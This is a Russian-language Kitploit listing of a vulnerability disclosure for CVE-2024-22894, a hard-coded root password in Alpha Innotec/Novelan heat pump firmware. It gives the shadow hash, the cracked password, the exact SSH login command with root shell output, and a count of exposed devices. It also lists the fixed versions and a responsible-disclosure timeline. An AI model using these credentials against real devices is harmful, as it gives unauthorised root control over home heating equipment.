Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-22894 — Эксплойт Proof-of-concept для CVE-2024-22894, демонстрирующий извлечение зашифрованного 3DES пароля root из прошивки тепловых насосов Alpha Innotec/Novelan, обеспечивающий доступ по SSH к уязвимым IoT-устройствам. | Kitploit
Инструменты/GitHubGitHub/jaarden/cve-2024-22894
Безопасность встроенных системВзлом паролейБезопасность IoTАнализ уязвимостейЭксплуатацияСетевая безопасностьКриптографияБезопасность оборудования и IoTАнализ Прошивок
GitHubjaarden/cve-2024-22894

CVE-2024-22894

Эксплойт Proof-of-concept для CVE-2024-22894, демонстрирующий извлечение зашифрованного 3DES пароля root из прошивки тепловых насосов Alpha Innotec/Novelan, обеспечивающий доступ по SSH к уязвимым IoT-устройствам.

312 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий

CVE-2024-22894

Загружена последняя версия прошивки теплового насоса wp2reg-V3.88.0-9015 с https://www.heatpump24.com/DownloadArea.php. Внутри этой прошивки находится файл: wp2reg-V3.88.0-9015\wp2reg-AlphaInnotech-prod\home.wp2reg-V3.88.0-9015_221213\share\shadow

Он содержит зашифрованный 3DES пароль root:MEfgX2vrPJzuE:0:0:99999:7::: системного пользователя root, который при расшифровке/взломе (в течение 5 секунд) показывает пароль eschi.

При подключении моего теплового насоса к сети с помощью сетевого кабеля вы можете использовать пользователя 'root' и найденный пароль для входа в доступную службу SSH.

root@kitploit:~
> ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -c aes256-cbc root@$IP
$IP's password: eschi
# id
uid=0(root) gid=0 groups=0
# uname -a
Linux [...]  2.6.33.20 #3 PREEMPT Wed Oct 24 14:25:34 CEST 2018 armv5tejl GNU/Linux

Эта уязвимость применима ко всем тепловым насосам Alpha Innotec и Novelan, работающим под управлением контроллера Luxtronic. Она подтверждена и устранена компанией AIT Deutschland, OEM-производителем Alpha Innotec и Novelan, и уязвимость присутствует в следующих версиях прошивки:

  • Версии до V2.88.3
  • Версии до V3.89.0
  • Версии до V4.81.3

Тепловой насос должен быть подключен к сети с помощью LAN (RJ-45) для её неправомерного использования. Согласно Shodan, к интернету всё ещё подключены 47 тепловых насосов с той же версией SSH и отпечатком, которые могут быть скомпрометированы с помощью этой эксплойта.

В случае эксплуатации это может привести к значительному ущербу, например, изменению настроек или удалению всей конфигурации/программного обеспечения, что вызовет неисправность или сбой теплового насоса. Например, домашний каталог содержит следующие файлы, которые могут быть интересны атакующему:

root@kitploit:~
# ls -alh /home
total 7448
drwxr-xr-x    5 root     0           4.8K Jan 12 08:59 .
drwxr-xr-x   14 root     0            992 Aug  1  2011 ..
drwxr-xr-x    3 root     0            224 Jan  1  1970 .update
-rw-rw-rw-    1 root     0          92.3K Jul 20  2022 10Min_1
-rw-rw-rw-    1 root     0          92.3K Sep 15  2022 10Min_2
-rwxrwxrwx    1 root     0          22.3K Jan 13  2021 ASB.bin
-rwxrwxrwx    1 root     0          23.3K Jul 15  2019 ASB_BL_Switch.bin
-rwxrwxrwx    1 root     0          22.1K Jul 15  2019 ASB_bootloader.bin
-rwxrwxrwx    1 root     0           1.2K Jun 16  2021 Defines.txt
-rwxrwxrwx    1 root     0          15.7K Jun 14  2021 HZIO.lin
-rw-rw-rw-    1 root     0            648 Jan  3 18:55 Info.dti
-rwxrwxrwx    1 root     0          15.3K Jul 24  2020 LD2AG.lin
-rwxrwxrwx    1 root     0          37.5K Jul 15  2019 LWD.lin
-rwxrwxrwx    1 root     0          26.8K Feb  8  2021 LWD45.lin
-rwxrwxrwx    1 root     0          38.8K Jul 15  2019 LWD90.lin
-rwxrwxrwx    1 root     0          37.9K Jul 15  2019 LWDRev.lin
-rwxrwxrwx    1 root     0          40.0K Jun 16  2021 LuxConst.sqlite
-rwxrwxrwx    1 root     0          26.9K Jul 24  2020 MSW_15.lin
-rwxrwxrwx    1 root     0          28.4K Jul 24  2020 MSW_Inverter.lin
-rw-rw-rw-    1 root     0         435.2K Jan 12 08:59 NewProc
-rw-rw-rw-    1 root     0           8.8K Jan  1 01:00 ParamArchive_1704067200
[...]
-rw-rw-rw-    1 root     0           8.8K Jan 12 01:00 ParamArchive_1705017600
-rwxrwxrwx    1 root     0          96.9K Jul 15  2019 SEC.bin
-rwxrwxrwx    1 root     0          31.6K Jul 15  2019 SWP.lin
-rwxrwxrwx    1 root     0          30.6K Jul 15  2019 SWPH.lin
-rwxrwxrwx    1 root     0          30.4K Jul 15  2019 SWPH291.lin
drwxrwxrwx    2 root     0            648 Apr 25  2023 Webserver
-rwxrwxrwx    1 root     0           5.0M Jun 16  2021 appl
-rwxrwxrwx    1 root     0            147 Jul 15  2019 appl.cfg
-rw-rw-rw-    1 root     0           8.8K Jan 12 08:59 appl_param1
-rw-rw-rw-    1 root     0           8.8K Jan 12 06:59 appl_param2
-rwxrwxrwx    1 root     0           9.4K Jul 15  2019 bootloader.lin
-rw-r--r--    1 root     0          20.0K Jan  1 05:10 default.sqlite
-rw-r--r--    1 root     0              0 Jan  1  1970 default.sqlite-wal
-rw-rw-r--    1 root     0             56 Sep 15  2022 errlog
-rw-r--r--    1 root     0          42.9K Apr  1  2011 firmware
-rwxrwxrwx    1 root     0            391 Jul 15  2019 index.html
-rwxrwxrwx    1 root     0          35.2K Jun 16  2021 lang_CR
[...
-rwxrwxrwx    1 root     0          37.8K Jun 16  2021 lang_tr
drwxr-xr-x    2 root     0            360 Jan  1  1970 share
-rwxrwxrwx    1 root     0             37 Jul 15  2019 timezone
-rwxrwxrwx    1 root     0           1.1K Jul 15  2019 udhcpc.script

Исправленные версии

  • V2.88.3 или выше
  • V3.89.0 или выше
  • V4.81.3 или выше

Хронология

  • [13-06-2023] Ответственное раскрытие информации: AIT-Deutschland (OEM), Alpha Innotec (бренд), Novelan (бренд), Nathan (голландский реселлер).
  • [19-06-2023] Ответ от AIT-Deutschland с предложением встречи.
  • [22-06-2023] Встреча с AIT-Deutschland по поводу уязвимости.
  • [01-07-2023 - 01-12-2023] AIT-Deutschland разрабатывает исправление уязвимости.
  • [14-12-2023] Сбор информации для деталей CVE.
  • [10-01-2024] Встреча с AIT-Deutschland по поводу подачи деталей CVE.
  • [26-01-2024] Присвоен идентификатор CVE-2024-22894.
  • [30-01-2024] Опубликован CVE-2024-22894.

Благодарности

Благодарность AIT-Deutschland за то, что отнеслись к этой проблеме серьёзно и исправили её в приоритетном порядке.

Скачать инструмент